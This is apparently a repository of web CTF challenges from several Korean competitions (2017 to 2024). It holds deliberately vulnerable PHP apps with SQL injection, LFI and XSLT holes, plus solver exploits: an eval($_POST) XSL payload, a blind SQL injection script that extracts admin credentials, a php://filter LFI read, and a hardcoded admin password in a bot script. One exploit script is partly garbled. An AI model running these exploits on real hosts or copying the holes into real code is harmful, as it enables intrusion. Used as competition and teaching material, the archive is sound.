├── 2017 ├── Belluminar2017 │ ├── README.md │ ├── color-world.pdf │ └── prob │ │ ├── exploit │ │ ├── exploit5.xsl │ │ └── exploit7.xsl │ │ ├── htdocs │ │ ├── index.php │ │ ├── login.php │ │ └── page │ │ │ ├── 801f7201346b43f8ee8390a1ef20ddcd │ │ │ ├── green.xsl │ │ │ ├── orange.xsl │ │ │ └── red.xsl │ │ │ ├── assets │ │ │ ├── bootstrap.min.js │ │ │ ├── script.js │ │ │ └── style.css │ │ │ ├── base.php │ │ │ ├── config.php │ │ │ ├── index.php │ │ │ ├── readme.php │ │ │ └── style.xml │ │ └── table.sql ├── can_you_do_it │ ├── can_you_do_it.sql │ ├── config.php │ └── index.php ├── dirt-Y │ ├── exploit │ │ ├── findhex.py │ │ └── inject.py │ ├── flag.php │ └── index.php ├── is_this_possible │ ├── config.php │ ├── index.php │ └── is_this_possible.sql ├── layer7_external2017 │ ├── Daniel's_DAILY_LIFE │ │ ├── bbcode.sql │ │ ├── htdocs │ │ │ ├── admin │ │ │ │ ├── add_member.php │ │ │ │ ├── admin_home.php │ │ │ │ ├── admin_library.php │ │ │ │ ├── admin_read.php │ │ │ │ ├── admin_write.php │ │ │ │ └── index.php │ │ │ ├── assets │ │ │ │ ├── bootstrap-4.0.0-alpha.6.min.js │ │ │ │ ├── smooth-scroll.js │ │ │ │ └── style.css │ │ │ ├── bbcode.txt │ │ │ ├── contacts.php │ │ │ ├── cooking.php │ │ │ ├── home.php │ │ │ ├── include │ │ │ │ ├── config.php │ │ │ │ └── library.php │ │ │ ├── index.php │ │ │ ├── login.php │ │ │ ├── logout.php │ │ │ ├── read.php │ │ │ ├── robots.txt │ │ │ ├── shop │ │ │ │ └── shop.php │ │ │ └── song.php │ │ └── selenium │ │ │ └── bot.py │ ├── can_you_bypass_me │ │ ├── config.php │ │ ├── flagflagflagflag.php │ │ ├── index.php │ │ └── readme.md │ └── readme.md ├── power_of_xx_2017 │ ├── basic_web │ │ ├── exploit.py │ │ ├── readme.md │ │ ├── src │ │ │ ├── adm1n.htm │ │ │ ├── assets │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── style.css │ │ │ ├── board.htm │ │ │ ├── config.htm │ │ │ ├── home.htm │ │ │ ├── index.htm │ │ │ ├── login.htm │ │ │ ├── logout.htm │ │ │ └── send.htm │ │ └── table.sql │ └── sqlgame │ │ ├── readme.md │ │ ├── src │ │ ├── assets │ │ │ ├── 
adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png │ │ │ └── logo.png │ │ ├── config.php │ │ └── index.php │ │ └── table.sql └── simple_login │ ├── config.php │ ├── index.php │ └── table.sql ├── 2018 ├── 2018_Layer7_CTF_Margaret │ ├── README.md │ ├── db │ │ └── database.db │ └── html │ │ ├── .htaccess │ │ ├── classes │ │ ├── Controller.class.php │ │ ├── Render.class.php │ │ └── User.class.php │ │ ├── config │ │ ├── config.php │ │ └── function.php │ │ ├── index.php │ │ ├── public │ │ ├── css │ │ │ └── style.css │ │ ├── font │ │ │ └── BMYEONSUNG_ttf.ttf │ │ ├── img │ │ │ └── main.jpg │ │ └── js │ │ │ └── jquery-3.3.1.min.js │ │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── home.html │ │ ├── login.html │ │ ├── logout.html │ │ ├── mypage.html │ │ ├── need_session │ │ ├── logout.html │ │ └── mypage.html │ │ └── register.html ├── H3X0R-CTF-2018 │ ├── README.md │ ├── goodaegi_board │ │ ├── classes │ │ │ ├── board.class.php │ │ │ ├── database.class.php │ │ │ └── user.class.php │ │ ├── config │ │ │ ├── dbconfig.php │ │ │ └── function.php │ │ ├── control.php │ │ ├── flag.php │ │ ├── footer.php │ │ ├── goodaegi_board.sql │ │ ├── header.php │ │ ├── index.php │ │ ├── static │ │ │ ├── css │ │ │ │ └── style.css │ │ │ └── js │ │ │ │ ├── bootstrap.min.js │ │ │ │ ├── jquery-3.2.1.slim.min.js │ │ │ │ └── popper.min.js │ │ └── templates │ │ │ ├── board_body.html │ │ │ ├── board_footer.html │ │ │ ├── board_header.html │ │ │ ├── home.html │ │ │ ├── insert.html │ │ │ ├── join.html │ │ │ └── login.html │ └── sqlgame_revenge │ │ ├── config.php │ │ └── index.php ├── count │ ├── README.md │ ├── exploit │ │ ├── exploit.py │ │ └── php_file_put_contents_race_condition.png │ └── www │ │ ├── flag-6ece7416.php │ │ ├── index.php │ │ └── template.tpl └── hackingcamp18 │ ├── db │ └── database.db │ ├── exploit.py │ ├── html │ ├── .htaccess │ ├── classes │ │ ├── Controller.class.php │ │ ├── Render.class.php │ │ ├── Shop.class.php │ │ └── User.class.php │ ├── config │ │ ├── config.php │ │ 
└── function.php │ ├── index.php │ ├── public │ │ ├── css │ │ │ └── style.css │ │ ├── font │ │ │ └── BMYEONSUNG_ttf.ttf │ │ ├── img │ │ │ ├── flag.png │ │ │ ├── grim.png │ │ │ ├── helmet.png │ │ │ ├── shampoo.jpg │ │ │ └── tire.jpg │ │ └── js │ │ │ └── jquery-3.3.1.min.js │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── home.html │ │ ├── login.html │ │ ├── logout.html │ │ ├── mypage.html │ │ ├── register.html │ │ └── shop.html │ ├── readme.md │ └── www.zip ├── 2019 ├── Belluminar │ ├── .htaccess │ ├── classes │ │ ├── AlephDB │ │ │ ├── @Aleph.class.php │ │ │ ├── Aleph.class.php │ │ │ └── alephdb │ │ ├── Controller.class.php │ │ ├── MunTemplate.class.php │ │ ├── Render.class.php │ │ ├── User.class.php │ │ └── Videos.class.php │ ├── config │ │ ├── .htaccess │ │ ├── config.php │ │ ├── function.php │ │ └── server │ ├── index.php │ ├── static │ │ ├── css │ │ │ └── style.css │ │ ├── img │ │ │ ├── 404.png │ │ │ ├── logo.png │ │ │ └── main.png │ │ └── js │ │ │ └── jquery-3.4.1.min.js │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── index.html │ │ ├── login.html │ │ ├── mypage.html │ │ ├── read.html │ │ ├── register.html │ │ ├── upload.html │ │ └── videos.html ├── Christmas_CTF │ └── Dynamic_SQL │ │ ├── mild_taste(unintended) │ │ ├── config.php │ │ ├── function.php │ │ ├── index.php │ │ ├── login.php │ │ ├── source.zip │ │ └── static │ │ │ ├── bootstrap.min.js │ │ │ ├── favicon.png │ │ │ ├── jquery-3.4.1.min.js │ │ │ ├── pig.png │ │ │ ├── style.css │ │ │ └── theme.css │ │ └── spicy_taste │ │ ├── config.php │ │ ├── function.php │ │ ├── index.php │ │ ├── login.php │ │ ├── source.zip │ │ └── static │ │ ├── bootstrap.min.js │ │ ├── favicon.png │ │ ├── jquery-3.4.1.min.js │ │ ├── pig.png │ │ ├── style.css │ │ └── theme.css ├── Sunrin_Internet_High_School_CTF_2019 │ ├── README.md │ ├── jjang9 │ │ ├── 0.png │ │ ├── README.md │ │ ├── index.html │ │ ├── lfi.php │ │ └── upload.php │ ├── last_old_school │ │ ├── config.php │ │ └── index.php │ └── 
my_first_app │ │ ├── app │ │ ├── app.py │ │ ├── config.py │ │ ├── model.py │ │ ├── mydb.db │ │ ├── static │ │ │ ├── eye.png │ │ │ ├── mommyhand.png │ │ │ ├── munsiu.png │ │ │ ├── peach.png │ │ │ └── sibariza.png │ │ └── templates │ │ │ ├── board.html │ │ │ ├── home.html │ │ │ ├── login.html │ │ │ ├── profile.html │ │ │ ├── read.html │ │ │ ├── register.html │ │ │ ├── report.html │ │ │ └── write.html │ │ ├── chromedriver │ │ └── robot.py └── rename │ ├── backup │ └── index.html │ ├── index.php │ └── upload.php ├── 2021 └── LAYER7_CTF │ ├── handmade │ ├── Dockerfile │ ├── flag │ └── src │ │ ├── app.py │ │ ├── htdocs │ │ ├── about.html │ │ ├── blog.html │ │ ├── breadfactorytemplate.psd │ │ ├── contact.html │ │ ├── css │ │ │ └── style.css │ │ ├── images │ │ │ ├── bg-aside.jpg │ │ │ ├── bg-blog-heading.png │ │ │ ├── bg-body.jpg │ │ │ ├── bg-content.jpg │ │ │ ├── bg-footer.gif │ │ │ ├── bg-header.gif │ │ │ ├── bg-menu-selected.jpg │ │ │ ├── bg-menu-selected2.jpg │ │ │ ├── collection.jpg │ │ │ ├── croissants.jpg │ │ │ ├── favorites.jpg │ │ │ ├── icons.png │ │ │ ├── interface.png │ │ │ ├── loafs.jpg │ │ │ ├── logo.png │ │ │ ├── sandwiches.jpg │ │ │ ├── traditional.jpg │ │ │ └── whats-new.png │ │ ├── index.html │ │ └── menu.html │ │ ├── requirements.txt │ │ └── response_form.py │ └── selfmade │ ├── Dockerfile │ ├── flag │ └── src │ ├── app.py │ ├── contents │ ├── 1 │ └── 2 │ ├── htdocs │ └── index.html │ ├── requirements.txt │ └── response_form.py ├── 2022 ├── BOB_WEB_CTF │ ├── dom_clobbering │ │ ├── index.html │ │ └── writeup │ │ │ └── writeup.txt │ ├── pp │ │ ├── config.js │ │ ├── index.html │ │ └── writeup │ │ │ └── writeup.txt │ └── rpo │ │ ├── config.js │ │ ├── index.php │ │ └── writeup │ │ ├── exploit.html │ │ └── writeup.txt ├── HSPACE_CTF │ ├── hspace_proxy │ │ ├── admin │ │ │ ├── Dockerfile │ │ │ ├── db │ │ │ │ └── init.sql │ │ │ ├── flag.txt │ │ │ └── src │ │ │ │ ├── app.py │ │ │ │ ├── htdocs │ │ │ │ ├── index.html │ │ │ │ └── write.html │ │ │ │ ├── model.py │ │ │ 
│ ├── requirements.txt │ │ │ │ └── response_form.py │ │ ├── docker-compose.yml │ │ └── public │ │ │ ├── Dockerfile │ │ │ └── src │ │ │ ├── app.py │ │ │ ├── htdocs │ │ │ ├── index.html │ │ │ └── notice.html │ │ │ ├── model.py │ │ │ ├── requirements.txt │ │ │ └── response_form.py │ ├── lucky7 │ │ ├── index.php │ │ └── lucky.php │ └── maidcha │ │ ├── Dockerfile │ │ ├── flag │ │ ├── memo │ │ ├── 1 │ │ └── 2 │ │ └── src │ │ ├── app.py │ │ ├── htdocs │ │ └── index.html │ │ ├── requirements.txt │ │ └── response_form.py └── SUNRIN_CTF │ ├── BABY_XSS │ ├── bot │ │ └── bot.py │ ├── index.php │ ├── init.sql │ ├── onlybot.php │ └── report.php │ ├── HAPPY │ ├── bot │ │ └── bot.py │ ├── config.js │ ├── index.php │ ├── init.sql │ ├── onlybot.php │ ├── report.php │ └── writeup │ │ └── exploit.html │ └── LOGIN_MASTER │ ├── config.php │ ├── ebd03212efcf1965e52fb3d838fabb92.db │ ├── index.php │ └── user.php ├── 2024 └── SUNRIN_CTF │ ├── checkjs │ ├── Dockerfile │ ├── app │ │ ├── flag │ │ └── index.js │ ├── docker-compose.yml │ └── for_user.zip │ └── memoboard │ ├── Dockerfile │ ├── docker-compose.yml │ ├── for_user.zip │ └── src │ ├── 2fa.php │ ├── board.php │ ├── db.php │ ├── index.php │ ├── login.php │ ├── logout.php │ ├── mypage.php │ ├── register.php │ ├── style.css │ └── verify.php ├── .gitattributes └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | * linguist-vendored 2 | -------------------------------------------------------------------------------- /2017/Belluminar2017/README.md: -------------------------------------------------------------------------------- 1 | # Belluminar-2017-Color-world 2 | 3 | ~~~ 4 | made by munsiwoo 5 | ~~~ 6 | 7 | * Color World 8 | 9 | * LFI, SQL Injection, XSLT Vuln 10 | 11 | * 풀이는 color-world.pdf 참고 -------------------------------------------------------------------------------- /2017/Belluminar2017/color-world.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/Belluminar2017/color-world.pdf -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/exploit/exploit5.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 |
9 |
10 | Vendor:
11 | Vendor URL: 12 | 13 | eval($_POST[code]); 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/exploit/exploit7.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 |
9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/index.php: -------------------------------------------------------------------------------- 1 | location.href='?page=login'"); 7 | if(!file_exists($page.".php")) echo "file not found.\n"; 8 | if(!preg_match("/page/i", $page)) require($page.".php"); -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/green.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 |
9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/orange.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 |
9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/red.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 |
9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/assets/script.js: -------------------------------------------------------------------------------- 1 | function load(argv){ 2 | var colors = document.colors; 3 | colors.color.value = argv; 4 | colors.submit(); 5 | } -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/index.php: -------------------------------------------------------------------------------- 1 | location.href='../'"); 8 | } 9 | 10 | if(isset($_GET['leave'])){ 11 | session_destroy(); 12 | exit(""); 13 | } 14 | 15 | $conn = mysqli_connect($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME); 16 | 17 | $color = isset($_POST['color']) ? 
$_POST['color'] : 'red'; 18 | $query = "SELECT * FROM `xslt` WHERE xsl='".$color."'"; 19 | $assoc = mysqli_fetch_assoc(mysqli_query($conn, $query)) or die('color not found.'); 20 | 21 | $xml = new DOMDocument; 22 | $xml->load("style.xml"); 23 | 24 | $xsl = new DOMDocument; 25 | $xsl->load($assoc['path']); 26 | 27 | $proc = new XSLTProcessor; 28 | $proc->registerPHPFunctions(); 29 | $proc->importStyleSheet($xsl); 30 | 31 | require("base.php"); 32 | ?> 33 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/readme.php: -------------------------------------------------------------------------------- 1 | location.href='../'"); 7 | } 8 | 9 | # flag{bfpdopfoprowpelwlekdsooasdiasodiowoqwe} 10 | ?> -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/style.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | It's fun XD 5 | 6 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `users` ( 5 | `username` varchar(100) NOT NULL, 6 | `password` varchar(100) NOT NULL 7 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 8 | 9 | CREATE TABLE IF NOT EXISTS `xslt` ( 10 | `xsl` varchar(100) NOT NULL, 11 | `path` varchar(100) NOT NULL 12 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 13 | 14 | INSERT INTO `xslt` (`xsl`, `path`) VALUES 15 | ('red', './801f7201346b43f8ee8390a1ef20ddcd/red.xsl'), 16 | ('orange', './801f7201346b43f8ee8390a1ef20ddcd/orange.xsl'), 17 | ('green', './801f7201346b43f8ee8390a1ef20ddcd/green.xsl'); -------------------------------------------------------------------------------- /2017/can_you_do_it/can_you_do_it.sql: 
-------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS `can_you_do_it` ( 2 | `id` varchar(50) NOT NULL 3 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; 4 | 5 | 6 | INSERT INTO `can_you_do_it` (`id`) VALUES 7 | ('admin'), 8 | ('flag is {**secret**}'); -------------------------------------------------------------------------------- /2017/can_you_do_it/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/can_you_do_it/index.php: -------------------------------------------------------------------------------- 1 | 10) exit("id is too long"); 8 | 9 | $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) or die("connect error"); 10 | $query = "SELECT id FROM `can_you_do_it` WHERE id='".$_GET['id']."'"; 11 | $row = mysqli_fetch_array(mysqli_query($conn, $query); 12 | 13 | echo "
"; 14 | if($row['id']){ 15 | echo $row['id']; 16 | } 17 | else { 18 | echo "None"; 19 | } 20 | echo "
"; 21 | 22 | highlight_file(__FILE__); 23 | ?> -------------------------------------------------------------------------------- /2017/dirt-Y/exploit/findhex.py: -------------------------------------------------------------------------------- 1 | from random import randrange 2 | # dirt-Y challenge exploit 3 | # made by munsiwoo 4 | 5 | def find() : 6 | while True : 7 | random_one = randrange(100, 255) 8 | random_two = randrange(100, 255) 9 | xor = ord(chr(random_one)) ^ ord(chr(random_two)) 10 | if(xor == 50) : 11 | break 12 | 13 | a = '\\' + hex(random_one)[1:] 14 | b = '\\' + hex(random_two)[1:] 15 | print(a + ' ^ ' + b + ' = 2') 16 | 17 | if __name__ == '__main__' : 18 | find() 19 | -------------------------------------------------------------------------------- /2017/dirt-Y/exploit/inject.py: -------------------------------------------------------------------------------- 1 | from requests import get 2 | # dirt-Y challenge exploit 3 | # made by munsiwoo 4 | 5 | def main() : 6 | uri = 'http://127.0.0.1/probs/dirt-Y/index.php' 7 | headers = { 8 | 'Content-Type' : 'application/x-www-form-urlencoded', 9 | 'Cookie' : 'a=\xbd;b=\x8f;x=88;' 10 | } 11 | 12 | for x in range(1000000) : 13 | response = get(uri, headers=headers) 14 | if(response.text.find("flag{") != -1) : 15 | print(response.text) 16 | break 17 | 18 | print('Number of attempts : ' + str(x)) 19 | 20 | if __name__ == '__main__' : 21 | main() 22 | -------------------------------------------------------------------------------- /2017/dirt-Y/flag.php: -------------------------------------------------------------------------------- 1 | \n"; 4 | echo "

flag{yes_this_prob_is_dirty_ʕ•ᴥ•ʔ}

\n"; 5 | exit; 6 | } 7 | ?> -------------------------------------------------------------------------------- /2017/dirt-Y/index.php: -------------------------------------------------------------------------------- 1 | Congratulation!!!!
flag is **secret**"); 9 | } 10 | ?> -------------------------------------------------------------------------------- /2017/is_this_possible/index.php: -------------------------------------------------------------------------------- 1 | |&|=|;|#|_|or|and|union|select|into|info|sc|in|like|regex|rand|limit|prob|0x|0b/i"; 7 | if(preg_match($filter, $_GET['go'])) exit("403 forbidden"); 8 | if(preg_match("/\s/", $_GET['go'])) exit("whitespace nono"); 9 | 10 | $i = 0; 11 | $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); 12 | $query = mysqli_query($conn, "SELECT * FROM `is_this_possible` ORDER BY ".$_GET['go']." DESC"); 13 | 14 | echo ""; 15 | echo ""; 16 | while($row = mysqli_fetch_array($query)){ 17 | $res[$i++] = $row['id']; 18 | echo ""; 19 | } 20 | echo "
id
{$row['id']}

"; 21 | 22 | if($res[0] === "admin" && $res[1] === "19990301" && $res[2] === "guest"){ 23 | if((int)$res[1] == $_GET['foo'] && strlen($_GET['foo']) > 10){ 24 | solve(); 25 | } 26 | } 27 | } 28 | highlight_file(__FILE__); 29 | ?> -------------------------------------------------------------------------------- /2017/is_this_possible/is_this_possible.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | 3 | CREATE TABLE IF NOT EXISTS `is_this_possible` ( 4 | `id` varchar(50) NOT NULL 5 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 6 | 7 | 8 | INSERT INTO `is_this_possible` (`id`) VALUES 9 | ('admin'), 10 | ('guest'), 11 | ('19990301'), 12 | ('19970101'), 13 | ('20010609'); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/bbcode.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `contacts` ( 5 | `idx` int(11) NOT NULL AUTO_INCREMENT, 6 | `title` varchar(100) NOT NULL, 7 | `contents` varchar(512) NOT NULL, 8 | PRIMARY KEY (`idx`) 9 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ; 10 | 11 | CREATE TABLE IF NOT EXISTS `cooking` ( 12 | `idx` int(11) NOT NULL AUTO_INCREMENT, 13 | `title` varchar(50) NOT NULL, 14 | `contents` varchar(10000) NOT NULL, 15 | PRIMARY KEY (`idx`) 16 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=6 ; 17 | 18 | INSERT INTO `cooking` (`idx`, `title`, `contents`) VALUES 19 | (1, 'Welcome to cooking category', 'welcome to cooking category
articles related to cooking will be posted.'), 20 | (2, 'Steak is very delicious XD', '\r\ngood good good~'); 21 | 22 | 23 | CREATE TABLE IF NOT EXISTS `song` ( 24 | `idx` int(11) NOT NULL AUTO_INCREMENT, 25 | `title` varchar(50) NOT NULL, 26 | `contents` varchar(10000) NOT NULL, 27 | PRIMARY KEY (`idx`) 28 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=3 ; 29 | 30 | INSERT INTO `song` (`idx`, `title`, `contents`) VALUES 31 | (1, 'Welcome to song category', 'Welcome to song category!'), 32 | (2, 'I love Sam Smith songs. XD', 'Im Not The Only One is good, Stay with me is good.'); 33 | 34 | CREATE TABLE IF NOT EXISTS `users` ( 35 | `token` varchar(100) NOT NULL, 36 | `username` varchar(100) NOT NULL, 37 | `password` varchar(100) NOT NULL, 38 | PRIMARY KEY (`username`) 39 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 40 | 41 | INSERT INTO `users` (`token`, `username`, `password`) VALUES 42 | ('1694138c2ede438201a100d641307ec78b3f3c96', 'admin', '1e5915d79c1edc1064f2862b0bb1b77318a0e6d670a99335eb4bf6b3d2e9fea6'); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_home.php: -------------------------------------------------------------------------------- 1 | location.href='../home.php';"); 7 | } 8 | ?> 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | Admin page 18 | 19 | 20 | 44 |
45 |
46 |
47 |

Admin page

48 |

daily life of Daniel

49 |
50 |
51 |
52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_library.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_read.php: -------------------------------------------------------------------------------- 1 | location.href='../';"); 8 | 9 | contacts_read(); 10 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/assets/smooth-scroll.js: -------------------------------------------------------------------------------- 1 | $('a[href*="#"]') 2 | // Remove links that don't actually link to anything 3 | .not('[href="#"]') 4 | .not('[href="#0"]') 5 | .click(function(event) { 6 | // On-page links 7 | if ( 8 | location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') 9 | && 10 | location.hostname == this.hostname 11 | ) { 12 | // Figure out element to scroll to 13 | var target = $(this.hash); 14 | target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); 15 | // Does a scroll target exist? 16 | if (target.length) { 17 | // Only prevent default if animation is actually gonna happen 18 | event.preventDefault(); 19 | $('html, body').animate({ 20 | scrollTop: target.offset().top 21 | }, 1000, function() { 22 | // Callback after animation 23 | // Must change focus! 
24 | var $target = $(target); 25 | $target.focus(); 26 | if ($target.is(":focus")) { // Checking if the target was focused 27 | return false; 28 | } else { 29 | $target.attr('tabindex','-1'); // Adding tabindex for elements not focusable 30 | $target.focus(); // Set focus again 31 | }; 32 | }); 33 | } 34 | } 35 | }); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/bbcode.txt: -------------------------------------------------------------------------------- 1 | [b]Bold Text[/b] 2 | [i]Italic Text[/i] 3 | [url]http://www.php.net/[/url] 4 | [url=http://pecl.php.net/][b]Content Text[/b][/url] 5 | [img]http://static.php.net/www.php.net/images/php.gif[/img] 6 | [url=http://www.php.net/] 7 | [img]http://static.php.net/www.php.net/images/php.gif[/img] 8 | [/url] -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/include/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/logout.php: -------------------------------------------------------------------------------- 1 | location.href='home.php';"); 7 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: / -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/shop/shop.php: 
-------------------------------------------------------------------------------- 1 | Congratulation!!!!flag is {dlanswpsdjEoTskdy?wharneorlduTdma?}'; 15 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/selenium/bot.py: -------------------------------------------------------------------------------- 1 | #-*- coding:utf-8 -*- 2 | from selenium import webdriver 3 | from time import sleep 4 | 5 | admin_id = "admin" 6 | admin_pw = "iopqwe123qwe@" 7 | login_page = "http://ctf.layer7.kr:6002/bbcode/login.php" 8 | read_page = "http://ctf.layer7.kr:6002/bbcode/admin/admin_read.php" 9 | 10 | driver = webdriver.PhantomJS() 11 | driver.implicitly_wait(3) 12 | 13 | driver.get(login_page) 14 | driver.find_element_by_name("username").send_keys(admin_id) 15 | driver.find_element_by_name("password").send_keys(admin_pw) 16 | submit_button = driver.find_elements_by_xpath("//input[@value='Submit']")[0] 17 | submit_button.click() 18 | 19 | while(1) : 20 | driver.get(read_page) 21 | sleep(2) -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/flagflagflagflag.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/index.php: -------------------------------------------------------------------------------- 1 | '; 20 | highlight_file(__FILE__); -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/readme.md: -------------------------------------------------------------------------------- 1 | # 
can-you-bypass-me? 2 | can you bypass me? (web) - regexp bypass, wild card 3 | 4 | ###### I used Docker. 5 | -------------------------------------------------------------------------------- /2017/layer7_external2017/readme.md: -------------------------------------------------------------------------------- 1 | Layer7 CTF 2 | ============= 3 | 2017-09-23 09:00 ~ 2017-09-24 09:00 4 | ------------- 5 | 6 | -------------------------------------- 7 | ###### can you bypass me? (web) - regexp bypass, wild card 8 | ###### present (web) - released later 9 | ###### daily life of Daniel (web) - xss 10 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/exploit.py: -------------------------------------------------------------------------------- 1 | #-*- coding:utf-8 -*- 2 | import http.client, base64 3 | from urllib.parse import quote 4 | 5 | ''' 6 | power of xx - basic web1 7 | blind insert injection 8 | made by SiwooMun 9 | ''' 10 | 11 | conn = http.client.HTTPConnection('125.131.189.15', 6001) 12 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 13 | 14 | conn.request('GET', '/?p=php://filter/convert.base64-encode/resource=config', '', headers) 15 | secret_key = base64.b64decode(conn.getresponse().read()).decode('utf-8') # config.php 16 | 17 | payload = (lambda col,x,y:",if((select substr(%s,%d,1) from users)=%s,(select 1 union select 2), 2))#"%(col,x,y)) 18 | quote_escape = 'email=a&title=a\&contents=' 19 | username = password = "" 20 | 21 | for x in range(1, 6) : # extract username 22 | for y in 
"abcdefghijklmnopqrstuvwxyz0123456789" : 34 | body = quote_escape + quote(payload('password',x,str(hex(ord(y))))) 35 | conn.request('POST', '/send.htm', body, headers) 36 | response = str(conn.getresponse().read()) 37 | 38 | if(response.find('err') != -1) : 39 | password += y 40 | print("password : " + password) 41 | break 42 | 43 | conn.close() 44 | 45 | print('----- config.php -----') 46 | print(secret_key) # secret key : powerofxx 47 | print('----------------------') 48 | print('username : ' + username) 49 | print('password : ' + password) 50 | print('----------------------') -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/readme.md: -------------------------------------------------------------------------------- 1 | # Power of Xx 2017 2 | 3 | ~~~ 4 | * 제작 : 문시우 5 | 6 | * 문제명 : basic web 7 | 8 | * 난이도 : 하 9 | 10 | * 분야 : 웹 11 | ~~~ 12 | ~~~ 13 | 설명 : lfi + sqli (error based blind insert injection) 14 | ?p= 파라미터에서 lfi 취약점이 발생한다. php wrapper를 이용해 소스를 얻을 수 있다. 15 | ex : ?p=php://filter/convert.base64-encode/resource=config 16 | 17 | 소스를 얻고 소스를 분석하여 sql injection 을 수행하면된다. (send.htm 에서 취약점 발생) 18 | sql injection 으로 어드민의 패스워드를 알아냈다면 config.htm에 있는 secret_key와 얻어낸 아이디/패스워드로 19 | 어드민 계정으로 로그인해서 adm1n.htm로 접근하면 플래그를 얻을 수 있다. 
